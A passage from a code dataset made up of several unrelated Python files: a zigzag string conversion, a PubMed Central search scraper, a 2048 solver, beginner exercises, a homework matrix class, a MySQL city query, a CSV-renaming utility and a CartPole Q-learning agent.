isOddCol:\n # if odd col, then reverse the order\n row = numRows - 1 - row\n\n if not isSkip:\n ar[row].append(s[sIndex])\n sIndex += 1\n\n travel += 1\n\n return \"\".join(map(\"\".join, ar))\n\n\n# -----------------------------\nimport unittest\n\nclass Test(unittest.TestCase):\n def test(self):\n s = Solution()\n self.assertEqual(s.convert(\"ABC\", 2), \"ACB\")\n self.assertEqual(s.convert(\"ABCDE\", 4), \"ABCED\")\n self.assertEqual(s.convert(\"ABCDEF\", 4), \"ABFCED\")\n self.assertEqual(s.convert(\"PAYPALISHIRING\", 3), \"PAHNAPLSIIGYIR\")\n","sub_path":"src/main/python/zigzag_conversion.py","file_name":"zigzag_conversion.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291966079","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import print_function\r\n# import urllib.request\r\n# import urllib2\r\nimport lxml.html\r\nfrom lxml import etree\r\nimport os\r\n\r\n''' used with urllib.request'''\r\n# def pmcSearch(query, k):\r\n# query = query.strip().replace(\" \",\"+\")\r\n# url = \"http://www.ncbi.nlm.nih.gov/pmc/?term=open+access[filter]+\" + query\r\n# with urllib.request.urlopen(url) as response:\r\n# html = lxml.html.fromstring(response.read())\r\n# result = html.xpath('//dl[@class=\"rprtid\"]/dd')\r\n# output = list()\r\n# for i in range(0,k):\r\n# output.append(result[i].text_content())\r\n# return output\r\n\r\n\r\n'''used with urllib2'''\r\ndef pmcSearch(query, k):\r\n query = query.strip().replace(\" \",\"+\")\r\n url = \"http://www.ncbi.nlm.nih.gov/pmc/?term=open+access[filter]+\" + query\r\n response = urllib2.urlopen(url)\r\n html = lxml.html.fromstring(response.read())\r\n response.close()\r\n result = html.xpath('//dl[@class=\"rprtid\"]/dd')\r\n output = list()\r\n if(len(result) == 0):\r\n return output\r\n if k > len(result):\r\n k = len(result)\r\n for i in range(0,k):\r\n output.append(result[i].text_content())\r\n return output\r\n\r\n\r\ndef getTitleOfArticle(file):\r\n tree = etree.parse(file)\r\n root = tree.getroot()\r\n title = root.xpath('//article-title')[0]\r\n return title.text\r\n\r\n\r\n# corpusPath = \"/users/sig/gnguyen/corpus/TREC-CDS-2016/collection/pmc-00/39/\"\r\n# for aFile in os.listdir(corpusPath):\r\n# article_id = \"PMC\"+os.path.basename(aFile).split(\".nxml\")[0]\r\n# title = getTitleOfArticle(corpusPath+aFile)\r\n# resultIdList = pmcSearch(title,5)\r\n# if article_id in resultIdList:\r\n# print(article_id+\": ok\")\r\n# else:\r\n# print(article_id+\": ko\")\r\n\r\n","sub_path":"python/pmc-search/pmc-search.py","file_name":"pmc-search.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"389219196","text":"import sys,copy\nfrom itertools import chain\ninput = sys.stdin.readline\nN = int(input())\n\nboard = [list(map(int,input().split())) for _ in range(N)]\n#0이 아닌 값들을 리스트에담아서 계산하는방식으로 풀었습니다.\n#방향이 U,D 일경우 90% 왼쪽 회전후 계산한다음 다시 오른쪽으로 돌려놓는 방식입니다.\ndef rotate(board,direction):\n rotated = [[0]*N for _ in range(N)]\n if direction == 'R':\n for i in range(N):\n for j in range(N):\n rotated[i][j] = board[N-j-1][i]\n elif direction == 'L':\n for i in range(N):\n for j in range(N):\n rotated[i][j] = board[j][N-i-1]\n return rotated\n\ndef move(dir,board):\n board = copy.deepcopy(board)\n result = []\n if dir =='L' or dir == 'R':\n for i in range(N):\n temp =[]\n # 한줄 한줄 읽으며 0 이아닌값을 temp에 담고,\n for j in range(N):\n if board[i][j] != 0:\n temp.append(board[i][j])\n #그렇게해서 만들어진 temp 를 merge 함수를통해 만들어진 결과값을 result에 넣어줍니다.\n result.append(merge(temp,dir))\n elif dir == 'U' or dir =='D':\n #U는 판을 왼쪽으로 90도 돌린후 L계산한것을 다시 오른쪽으로 돌린값과 같습니다\n #D는 판을 왼쪽으로 90도 돌린후 R계산한것을 다시 오른쪽으로 돌린값과 같습니다\n board = rotate(board,'L')\n for i in range(N):\n temp =[]\n for j in range(N):\n if board[i][j] != 0:\n temp.append(board[i][j])\n if dir =='U':\n result.append(merge(temp,'L'))\n elif dir == 'D':\n result.append(merge(temp,'R'))\n result = rotate(result,'R')\n return result\n\ndef merge(temp,dir):\n made = []\n if dir =='L':\n #temp의 길이-1 까지 돌면서 뒷값과 비교\n for i in range(len(temp)-1):\n #같다면 앞값을 2로바꾸고 뒷값을 0으로 바꿉니다.\n if temp[i] == temp[i+1]:\n temp[i]*=2\n temp[i+1] = 0\n \n #0이아니라면 made에 넣어줍니다.\n if temp[i] != 0:\n made.append(temp[i])\n #마지막값은 포문안에서 해결안됐으므로, 만약 0이아니라면 made에 넣어줍니다.\n if temp and temp[-1] != 0:\n made.append(temp[-1])\n #판의 크기만큼 0을 오른쪽에 붙여줍니다.\n while len(made) != N:\n made.append(0)\n elif dir =='R':\n #방법은 같지만 왼쪽을 채워넣어야하기에 insert를 사용하였고\n for i in range(len(temp)-1,0,-1):\n if temp[i] == temp[i-1]:\n temp[i] *= 2 \n temp[i-1] = 0\n if temp[i]!= 0:\n made.insert(0,temp[i])\n if temp and temp[0] != 0:\n made.insert(0,temp[0])\n\n #0 또한 왼쪽에 채워야하기에 insert.\n while len(made) != N:\n made.insert(0,0)\n \n return made\nanswer = 0\n\ndef dfs(board,depth):\n global answer\n #5번 돌았을때 가장큰값을 업데이트후 종료합니다.\n if depth == 5:\n answer = max(max(list(chain(*board))), answer)\n return\n #실제 보드에 영향받지않게 복사합니다\n copied_board = copy.deepcopy(board)\n dfs(move('R',copied_board), depth+1)\n dfs(move('L',copied_board), depth+1)\n dfs(move('U',copied_board), depth+1)\n dfs(move('D',copied_board), depth+1)\n\n\ndfs(board,0)\nprint(answer)\n","sub_path":"2048easy.py","file_name":"2048easy.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363043925","text":"print(\"\"\"\nWhat does this \\a do?\nI don't know\\b sir.\nyeah \\f dude.\nwhat \\r the hell.\n\\v bro.\"\"\")\n\nfor i in range(0, 5):\n if i == 3:\n break\n if i == 0:\n continue\n print(i)\n\ndef main(a, b):\n try:\n d = a / b\n except:\n print(\"Nope.\")\n return\n return d\n if b == 6:\n raise Nosir(\"Bad idea.\")\n\nmain(4, 0)\nmain(4, 6)\nmain(8, 23)\n\nvar = 32\n\ndef new():\n print(var)\ndef old():\n global var\n var = 23\ndef cool():\n var = 43\n\nnew()\nprint(\"Should be 32.\")\nold()\nnew()\nprint(\"Should be 23\")\ncool()\nnew()\nprint(\"Should be 23\")\n\nf = lambda x: x + 2*x*x\nfor i in range(0, 7):\n print(f(i))\n\ndef crap():\n pass\n\nwith open(\"ex15_sample.txt\", \"w\") as my_file:\n my_file.write(\"Hey bro.\")\n\ndef generator():\n for i in range(7):\n yield i**i\ng = generator()\nfor i in g:\n print(i)\n\nprogram = \"m =4 \\nn=10 \\nprint('Sum = ', m*n)\"\nexec(program)\n","sub_path":"ex37.py","file_name":"ex37.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"213546719","text":"from __future__ import annotations\n\nimport copy\nimport typing as t\nfrom array import array\nfrom collections.abc import Iterable\nimport numpy as np\n\nimport lac.vector as vector_ops\nfrom lac import Vector, PRECISION\n\n\nclass Matrix:\n @classmethod\n def from_columnvectors(cls, vectors: t.Iterable[Vector]):\n vectors = list(vectors)\n _validate_vector_dimensions(vectors)\n rowvectors = [Vector(v[i] for v in vectors) for i in range(vectors[0].dim)]\n return cls(rowvectors)\n\n @classmethod\n def make_random(cls, num_rows: int, num_columns: int):\n \"\"\"A Matrix built out of random unit row vectors. \"\"\"\n return cls(Vector.make_random(num_columns) for _ in range(num_rows))\n\n @classmethod\n def make_identity(cls, num_rows: int, num_columns: int):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n return cls(rowvectors)\n\n @classmethod\n def make_zero(cls, num_rows: int, num_columns: int):\n return cls(Vector.make_zero(num_columns) for _ in range(num_rows))\n\n @classmethod\n def make_row_switching(cls, num_rows: int, num_columns: int, i: int, j: int):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n rowvectors[i], rowvectors[j] = rowvectors[j], rowvectors[i]\n return cls(rowvectors)\n\n @classmethod\n def make_row_multiplying(\n cls, num_rows: int, num_columns: int, i: int, m: t.Union[int, float]\n ):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n rowvectors[i] = m * rowvectors[i]\n return cls(rowvectors)\n\n @classmethod\n def make_row_addition(\n cls, num_rows: int, num_columns: int, i: int, j: int, m: t.Union[int, float]\n ):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n rowvectors[j] = rowvectors[j] + Vector(\n m if j_ == i else 0 for j_ in range(num_columns)\n )\n return cls(rowvectors)\n\n def __init__(self, rowvectors: t.Iterable[t.Union[Vector, t.Iterable[t.Union[int, float]]]]):\n self._rowvectors = [\n Vector(row) if not isinstance(row, Vector) else row for row in rowvectors\n ]\n _validate_vector_dimensions(self._rowvectors)\n\n @property\n def columnvectors(self) -> t.Tuple[Vector, ...]:\n return tuple(self.itercolumns())\n\n @property\n def rowvectors(self) -> t.Tuple[Vector, ...]:\n return tuple(copy.deepcopy(self._rowvectors))\n\n @property\n def num_columns(self) -> int:\n ## homework:start\n return len(self[0])\n ## homework:end\n\n @property\n def num_rows(self) -> int:\n ## homework:start\n return len(self.rowvectors)\n ## homework:end\n\n @property\n def shape(self) -> t.Tuple[int, int]:\n return (self.num_rows, self.num_columns)\n\n @property\n def T(self) -> Matrix:\n if not hasattr(self, \"_T\"):\n ## homework:start\n self._T=Matrix(self.columnvectors)\n return self._T\n\n @property\n def determinant(self) -> float:\n if not hasattr(self, \"_det\"):\n ## homework:start\n self._det = 4\n ## homework:end\n return self._det\n\n @property\n def inverse(self) -> Matrix:\n if not hasattr(self, \"_inverse\"):\n ## homework:start\n self._inverse = 2\n ## homework:end\n return self._inverse\n\n @property\n def trace(self) -> float:\n if not hasattr(self, \"_trace\"):\n ## homework:start\n self._trace = 4\n ## homework:end\n return self._trace\n\n def iterrows(self) -> t.Generator[Vector, None, None]:\n for row in self._rowvectors:\n yield copy.copy(row)\n\n def itercolumns(self) -> t.Generator[Vector, None, None]:\n for j in range(self.num_columns):\n yield Vector(self._rowvectors[i][j] for i in range(self.num_rows))\n\n def __eq__(self, other):\n return almost_equal(self, other)\n\n def __matmul__(self, other: Matrix) -> Matrix:\n ## homework:start\n return matrix_multiply(self,other)\n ## homework:end\n\n def __add__(self, other: Matrix) -> Matrix:\n ## homework:start\n return add(self,other)\n ## homework:end\n\n def __rmul__(self, k: t.Union[int, float]) -> Matrix:\n ## homework:start\n return scale(self,k)\n ## homework:end\n\n def __neg__(self) -> Matrix:\n ## homework:start\n return scale(self,-1)\n ## homework:end\n\n def __sub__(self, other: Matrix) -> Matrix:\n ## homework:start\n return subtract(self,other)\n ## homework:end\n\n def __iter__(self):\n return self.iterrows()\n\n def __len__(self) -> int:\n return self.num_rows\n\n def __getitem__(self, slice_):\n if isinstance(slice_, int):\n return self._rowvectors[slice_]\n elif isinstance(slice_, slice):\n rowvectors = self._rowvectors[slice_]\n return type(self)(rowvectors)\n elif isinstance(slice_, tuple):\n row, col = slice_\n if isinstance(row, int) and isinstance(col, int):\n return self._rowvectors[row][col]\n elif isinstance(row, slice) and isinstance(col, int):\n return Vector(v[col] for v in self.iterrows())\n elif isinstance(row, int) and isinstance(col, slice):\n return Vector(self._rowvectors[row][col])\n else:\n start, stop, step = self._read_slice(row, self.num_rows)\n rowvectors = (\n self._rowvectors[i][col] for i in range(start, stop, step)\n )\n return type(self)(rowvectors)\n else:\n raise RuntimeError(f\"unsupported slice type {slice_}\")\n\n def __setitem__(self, slice_, value):\n sequence_types = (list, tuple, array, Vector)\n if isinstance(value, sequence_types):\n if len(value) != self.num_columns and len(value != self.num_rows):\n msg = (\n \"vector has inconsisten dimension, must be number of rows ({}) or \"\n \"number of columns ({})\"\n )\n raise ValueError(msg.format(self.num_rows, self.num_columns))\n error_msg = f\"unsoported combination of slice ({slice_}) and values ({value})\"\n if isinstance(slice_, int):\n self._rowvectors[slice_][:] = value\n elif isinstance(slice_, slice):\n start, stop, step = self._read_slice(slice_, self.num_rows)\n for i in range(start, stop, step):\n self._rowvectors[i][:] = value\n elif isinstance(slice_, tuple):\n row, col = slice_\n if (\n isinstance(row, (int, slice))\n and isinstance(col, (int, slice))\n and isinstance(value, (int, float, *sequence_types))\n ):\n start_row, stop_row, step_row = self._read_slice(row, self.num_rows)\n start_col, stop_col, step_col = self._read_slice(col, self.num_columns)\n\n for i in range(start_row, stop_row, step_row):\n for j in range(start_col, stop_col, step_col):\n if isinstance(value, sequence_types):\n v = value[j]\n else:\n v = value\n self._rowvectors[i][j] = v\n\n else:\n raise TypeError(error_msg)\n else:\n raise TypeError(error_msg)\n\n def _read_slice(self, slice_, max_stop):\n if isinstance(slice_, int):\n start, stop, step = slice_, slice_ + 1, 1\n else:\n start = 0 if slice_.start is None else slice_.start\n stop = self.num_rows if slice_.stop is None else min(slice_.stop, max_stop)\n step = 1 if slice_.step is None else slice_.step\n return start, stop, step\n\n def __repr__(self):\n index = len(\"Vector(\")\n vals = \"\\n \".join(repr(v)[index:-1] for v in self.iterrows())\n return f\"Matrix(\\n {vals[:-1]}],\\n shape={self.shape}\\n)\"\n\n\ndef _validate_vector_dimensions(vectors: t.Sequence[Vector]) -> None:\n ref = vectors[0].dim\n if not all(v.dim == ref for v in vectors):\n raise ValueError(\n \"vectors do not have the same t.Union[int, float] of dimensions\"\n )\n\n\ndef _make_identity_rowvectors(num_rows, num_columns):\n rowvectors = []\n for i in range(num_rows):\n components = [0] * num_columns\n if i < num_columns:\n components[i] = 1\n rowvectors.append(Vector(components))\n return rowvectors\n\n\ndef scale(m: Matrix, k: t.Union[int, float]) -> Matrix:\n \"\"\"Scale matrix m by k. \"\"\"\n ## homework:start\n R_List = []\n for i in range(m.num_rows):\n R = []\n for j in range(m.num_columns):\n R.append(m[i][j]*k)\n R_List.append(R)\n output_matrix = Matrix(R_List)\n ## homework:end\n return output_matrix\n\n\ndef add(m1: Matrix, m2: Matrix) -> Matrix:\n \"\"\"Adds two matrices. \"\"\"\n ## homework:start\n R=[]\n if m1.num_columns==m2.num_columns and m1.num_rows==m2.num_rows:\n for i in range(m1.num_rows):\n R.append([])\n for j in range(m1.num_columns):\n R[i].append(m1[i,j]+m2[i,j])\n \n \n output_matrix = Matrix(R)\n ## homework:end\n return output_matrix\n\n \ndef subtract(m1: Matrix, m2: Matrix) -> Matrix:\n \"\"\"Substracts the second matrix from the first one. \"\"\"\n ## homework:start\n R=[]\n if m1.num_columns==m2.num_columns and m1.num_rows==m2.num_rows:\n for i in range(m1.num_rows):\n R.append([])\n for j in range(m1.num_columns):\n R[i].append(m1[i,j]-m2[i,j])\n \n \n output_matrix = Matrix(R)\n ## homework:end\n return output_matrix\n\n\ndef vector_multiply(m: Matrix, v: Vector, from_left: bool = False) -> Vector:\n \"\"\"Multiplies a matrix with a vector from the right or the left. \"\"\"\n cond1 = m.num_rows != v.dim and from_left\n cond2 = m.num_columns != v.dim and not from_left\n if cond1 or cond2:\n raise ValueError(f\"Shape mismatch: m({m.shape}), v({v.dim})\")\n\n ## homework:start\n\n R = []\n for i in range(m.num_rows):\n R.append(vector_ops.dot(m[i],v))\n output_vector = Vector(R)\n ## homework:end\n return output_vector\n\n\ndef matrix_multiply(m1: Matrix, m2: Matrix) -> Matrix:\n \"\"\"Multiplies two matrices together.\n\n Args:\n m1 (Matrix): Matrx of shape (m,n)\n m2 (Matrix): Matrix of shape (n, k)\n\n Returns:\n (Matrix): The product of m1 and m2, has shape (m, k)\n\n Raises:\n ValueError: if the number of columns in m1 does not match the\n number of rows in m2\n \"\"\"\n if m1.num_columns != m2.num_rows:\n msg = (\n \"num_columns of m1 must equal to num_rows m2, got {} and {} \"\n \"instead\"\n )\n raise ValueError(msg.format(m1.num_columns, m2.num_rows))\n ## homework:start\n R_List = []\n m2T = m2.T\n for i in range(m1.num_rows):\n R = []\n for j in range(m2T.num_rows):\n R.append(vector_ops.dot(m1[i],m2.T[j]))\n R_List.append(R)\n output_matrix = Matrix(R_List)\n ## homework:end\n return output_matrix\n\n\ndef almost_equal(m1: Matrix, m2: Matrix, ndigits: int = PRECISION) -> bool:\n return all(\n vector_ops.almost_equal(v1, v2, ndigits=ndigits) for v1, v2 in zip(m1, m2)\n )\n\n\ndef _validate_matrices_same_dimension(m1: Matrix, m2: Matrix):\n if m1.shape != m2.shape:\n raise ValueError(\n f\"matrices must have equal shape, got {m1.shape} and {m2.shape}\"\n )\n\n\ndef gaussian_elimination(mat: Matrix) -> Matrix:\n raise NotImplementedError\n\n\ndef lu_decomposition(mat: Matrix) -> Matrix:\n raise NotImplementedError\n\n\ndef eigenvalues(mat: Matrix) -> t.List[t.Union[int, float]]:\n raise NotImplementedError\n\n\ndef eigenvectors(mat: Matrix) -> t.List[Vector]:\n raise NotImplementedError\n","sub_path":"lac/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":12079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"57048975","text":"#!/usr/bin/python3\n'''takes name of state as argument and lists cities of that state'''\n\nimport MySQLdb\nfrom sys import argv\n\nif __name__ == \"__main__\":\n db = MySQLdb.connect('localhost', argv[1], argv[2], argv[3], 3306)\n cursor = db.cursor()\n sql = \"SELECT cities.name FROM cities INNER JOIN states\\\n ON cities.state_id = states.id WHERE states.name = %s\"\n cursor.execute(sql, (argv[4],))\n res = cursor.fetchall()\n if len(res) == 0:\n print('')\n for i in range(len(res)):\n if i != (len(res) - 1):\n print(\"{}, \".format(res[i][0]), end=\"\")\n else:\n print(res[i][0])\n db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"6915435","text":"# UPLOAD2_Rename_CSV_Files.py\nimport sys\nargument_count = 3\n\nif len(sys.argv) < argument_count:\n print('expecting '+str(argument_count)+' arguments')\n sys.exit()\n\nprint('sys.argv[0] '+sys.argv[0])\nprint('sys.argv[1] '+sys.argv[1])\nprint('sys.argv[2] '+sys.argv[2])\n\nenvironment_list = ['local','dev','prod']\nif not any(ext in sys.argv[1] for ext in environment_list):\n print('sys.argv[1] '+sys.argv[1]+' not found in environment_list '+', '.join(environment_list))\n sys.exit()\n\nupload_type_list = ['ftp','web']\nif not any(ext in sys.argv[2] for ext in upload_type_list):\n print('sys.argv[2] '+sys.argv[2]+' not found in upload_type_list '+', '.join(upload_type_list))\n sys.exit()\n\nif sys.argv[1] == 'local':\n if sys.argv[2] == 'ftp':\n logging_filename = r'D:\\COW\\WPA\\VFH\\UPLOAD\\log\\local_ftp.log'\n upload_folder = r'D:\\COW\\WPA\\VFH\\UPLOAD\\FTP'\n if sys.argv[2] == 'web':\n logging_filename = r'D:\\COW\\WPA\\VFH\\UPLOAD\\log\\local_web.log'\n upload_folder = r'D:\\COW\\WPA\\VFH\\UPLOAD\\WEB'\nif sys.argv[1] == 'dev':\n logging_filename = r'\\\\cowsvdwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvdwx123\\wpaptp\\UPLOAD'\nif sys.argv[1] == 'prod':\n logging_filename = r'\\\\cowsvpwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvpwx123\\wpaptp\\UPLOAD'\nprint('logging_filename '+logging_filename)\nprint('upload_folder '+upload_folder)\n\nimport csv\n\nimport os\nimport re\nfrom datetime import datetime\nfrom collections import OrderedDict\n\nreport_name_list = ['MONTHLYTRIP','DETAILTRIP','DRIVERLIST']\n\n# set up logging to file\nimport logging\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=logging_filename,\n filemode='w')\n# define a Handler which writes INFO messages or higher to the sys.stderr\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n# set a format which is simpler for console use\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n# tell the handler to use this format\nconsole.setFormatter(formatter)\n# add the handler to the root logger\nlogging.getLogger('').addHandler(console)\nlogger1 = logging.getLogger(sys.argv[0])\nlogger1.info('begin processing...')\n\nimport glob\n\nextension = '.csv'\nfor root, dirs, files in os.walk(upload_folder):\n #print(\"root \"+ root)\n #print(\"dirs \")\n #print(dirs)\n #print(\"files \")\n #print(files)\n\n if 'Working' in root:\n print('root '+root)\n for fname in files:\n print('fname '+fname)\n if os.path.splitext(fname)[-1] == extension:\n if not any(ext in fname for ext in report_name_list):\n #print('report_name_list')\n #print(report_name_list)\n \n company_name_dir = root\n print(\"company_name_dir \"+company_name_dir)\n company_name_dir_fname = os.path.join(root, fname) \n print(\"company_name_dir_fname \"+company_name_dir_fname)\n\n logger1 = logging.getLogger(company_name_dir_fname)\n logger1.info('begin processing...')\n\n key_found = False\n\n #with open(company_name_dir_fname, encoding='utf-8') as f:\n with open(company_name_dir_fname) as f:\n try:\n for row in csv.DictReader(f):\n #print(\"row \")\n #print(row)\n od = OrderedDict(row)\n #od.keys()\n print(\"od.keys() \")\n print(od.keys())\n \n if 'Lux_VehCount' in od.keys():\n key_found = True\n csv_filetype = 'MONTHLYTRIP'\n\n if 'Transaction_Date' in od.keys():\n key_found = True\n csv_filetype = 'DETAILTRIP'\n\n if 'Driver_License_No' in od.keys():\n key_found = True\n csv_filetype = 'DRIVERLIST'\n \n except UnicodeDecodeError as e:\n print(company_name_dir_fname)\n print(e)\n logger2 = logging.getLogger(company_name_dir_fname)\n logger2.error(e)\n\n print(\"company_name_dir_fname \"+company_name_dir_fname)\n if key_found:\n first_part = company_name_dir_fname.split(\".csv\",1)[0]\n #print('first_part = '+first_part)\n new_fname = first_part+\" - \"+csv_filetype+\".csv\"\n else:\n new_fname = company_name_dir_fname+'.error'\n print('new_fname = '+new_fname)\n\n try:\n os.rename(company_name_dir_fname,new_fname)\n logger1 = logging.getLogger(company_name_dir_fname+' has been renamed to...'+new_fname)\n logger1.info('SUCCESS')\n except FileExistsError as e:\n print(company_name_dir_fname)\n print(e)\n logger2 = logging.getLogger(new_fname)\n logger2.error(e)\n\n logger1 = logging.getLogger(company_name_dir_fname)\n logger1.info('end processing...')\nlogger1 = logging.getLogger(sys.argv[0])\nlogger1.info('end processing...')","sub_path":"WPA/VFH/Python/Scripts/UPLOAD2_Rename_CSV_Files_NEW.py","file_name":"UPLOAD2_Rename_CSV_Files_NEW.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553964529","text":"book = {}\n\nwith open('/Users/kuma/python/pyq/exam_1st/inout/room.csv',encoding='utf-8') as f:\n for row in f:\n cloumns = row.rstrip().split(',')\n room = cloumns[0]\n\n if room in book:\n book[room] += 1\n else:\n book[room] = 1\n\nprint(book)","sub_path":"exam_1st/room_count.py","file_name":"room_count.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553202920","text":"# Use Q-Learning with RBF Neural Network to solve CartPole\nfrom __future__ import print_function, division\nfrom builtins import range\n# NOTE: may need to update the version of future\n# pip3 install -U future\n\n# Works best with multiple RBF kernels at var = 0.05, 0.1, 0.5, 1.0\n\nimport os\nimport sys\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom gym import wrappers\nfrom datetime import datetime\nfrom sklearn.pipeline import FeatureUnion\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.kernel_approximation import RBFSampler\nfrom q_learning_bins import plot_running_avg\n\n\nclass SGDRegressor:\n\tdef __init__(self, D, learning_rate=0.1):\n\t\tself.w = np.random.randn(D) / np.sqrt(D)\n\t\tself.lr = learning_rate\n\n\tdef partial_fit(self, X, Y):\n\t\t# self.w += self.lr * (Y - X.dot(self.w)) * np.squeeze(X)\n\t\tself.w += self.lr * (Y - X.dot(self.w)).dot(X)\n\n\tdef predict(self, X):\n\t\treturn X.dot(self.w)\n\n\nclass FeatureTransformer:\n\tdef __init__(self, env, n_components=1000, n_samples=20000):\n\t\t# observation_examples = np.array([env.observation_space.sample() for i in range(n_samples)])\n\t\t# NOTE: state samples are poor, because we get velocity -> infinity\n\t\tobservation_examples = np.random.random((n_samples, env.observation_space.shape[0]))*2 - 1\n\t\tscaler = StandardScaler()\n\t\tscaler.fit(observation_examples)\n\n\t\t# Used to converte a state to a featurized representation.\n\t\t# We use RBF kernels with different variances to cover different parts of the space\n\t\tfeaturizer = FeatureUnion([\n\t\t\t('rbf1', RBFSampler(gamma=0.05, n_components=n_components)),\n\t\t\t('rbf2', RBFSampler(gamma=1.0 , n_components=n_components)),\n\t\t\t('rbf3', RBFSampler(gamma=0.5 , n_components=n_components)),\n\t\t\t('rbf4', RBFSampler(gamma=0.1 , n_components=n_components))\n\t\t])\n\t\tfeature_examples = featurizer.fit_transform(scaler.transform(observation_examples))\n\n\t\tself.dimensions = feature_examples.shape[1]\n\t\tself.scaler = scaler\n\t\tself.featurizer = featurizer\n\n\tdef transform(self, observations):\n\t\tscaled = self.scaler.transform(observations)\n\t\treturn self.featurizer.transform(scaled)\n\n\n# Holds one SGDRegressor for each action\nclass Model:\n\tdef __init__(self, env, feature_transformer, learning_rate=0.1):\n\t\tself.env = env\n\t\tself.models = []\n\t\tself.feature_transformer = feature_transformer\n\t\tfor i in range(env.action_space.n):\n\t\t\tmodel = SGDRegressor(feature_transformer.dimensions, learning_rate)\n\t\t\tself.models.append(model)\n\n\tdef predict(self, s):\n\t\tX = self.feature_transformer.transform(np.atleast_2d(s))\n\t\treturn np.array([m.predict(X)[0] for m in self.models])\n\n\tdef update(self, s, a, G):\n\t\tX = self.feature_transformer.transform(np.atleast_2d(s))\n\t\tself.models[a].partial_fit(X, [G])\n\n\tdef sample_action(self, s, eps):\n\t\tif np.random.random() < eps:\n\t\t\treturn self.env.action_space.sample()\n\t\telse:\n\t\t\treturn np.argmax(self.predict(s))\n\n\ndef play_one(model, eps, gamma, max_iters=2000):\n\tobservation = model.env.reset()\n\tdone = False\n\ttotalreward = 0\n\titers = 0\n\twhile not done and iters < max_iters:\n\t\t# if we reach 2000, just quit, don't want this going forever\n\t\t# the 200 limit seems a bit early\n\t\taction = model.sample_action(observation, eps)\n\t\tprev_observation = observation\n\t\tobservation, reward, done, info = model.env.step(action)\n\n\t\tif done:\n\t\t\treward = -200\n\n\t\t# update the model\n\t\tnext_q = model.predict(observation)\n\t\tassert(len(next_q.shape) == 1)\n\t\tG = reward + gamma * np.max(next_q)\n\t\tmodel.update(prev_observation, action, G)\n\n\t\tif reward == 1:\n\t\t\ttotalreward += reward\n\t\titers += 1\n\n\treturn totalreward\n\n\ndef main():\n\tgym.envs.register(\n\t\tid='MyCartPole-v0',\n\t\tentry_point='gym.envs.classic_control:CartPoleEnv',\n\t\tmax_episode_steps=10000,\n\t\treward_threshold=9975.0,\n\t)\n\tenv = gym.make('MyCartPole-v0')\n\t# env = gym.make('CartPole-v0')\n\tft = FeatureTransformer(env)\n\n\tif 'monitor' in sys.argv:\n\t\tfilename = os.path.basename(__file__).split('.')[0]\n\t\tmonitor_dir = './' + filename + '_' + str(datetime.now())\n\t\tenv = wrappers.Monitor(env, monitor_dir)\n\n\tmodel = Model(env, ft)\n\tgamma = 0.99\n\n\tN = 500\n\ttotalrewards = np.empty(N)\n\tfor n in range(N):\n\t\teps = 1.0 / np.sqrt(n + 1)\n\t\ttotalreward = play_one(model, eps, gamma)\n\t\ttotalrewards[n] = totalreward\n\t\tif n % 100 == 0:\n\t\t\tprint('episode:', n, 'total reward:', totalreward, 'eps:', eps, 'avg reward (last 100):', totalrewards[max(0, n-99):(n+1)].mean())\n\n\tprint('avg reward for last 100 episodes:', totalrewards[-100:].mean())\n\tprint('total steps:', totalrewards.sum())\n\n\tplt.plot(totalrewards)\n\tplt.title('Rewards')\n\tplt.show()\n\n\tplot_running_avg(totalrewards)\n\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"rl_deep/cartpole/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"2531077","text":"import pandas as pd\nimport numpy as np\n\ndrug_responses = pd.read_csv(\"data/DrugResponses.csv\")\ninhibitors_list = drug_responses.inhibitor.unique()\ndel drug_responses['ic50']\npivot_drug_response = pd.pivot_table(drug_responses, index='lab_id', columns='inhibitor', aggfunc=np.max, fill_value=0)\n# Remove NA values\npivot_drug_response = pivot_drug_response[np.isfinite(pivot_drug_response)]\n\n\ngene_counts = pd.read_csv(\"data/RNAseq.csv\", encoding=\"ISO-8859-1\", dtype={'lab_id': str})\ngene_counts.set_index('lab_id', inplace=True)\ngene_counts_transpose = gene_counts.transpose()\ngene_names = gene_counts.index\ngene_count_ids = gene_counts_transpose.index\n\n\ntop_gene_counts = gene_counts.loc[gene_names] # This includes all genes\ntop_gene_counts_t = top_gene_counts.transpose()\n\ndrugs_list = [22, 28, 43, 46, 82, 91, 109, 120]\nfor drug_num in drugs_list:\n 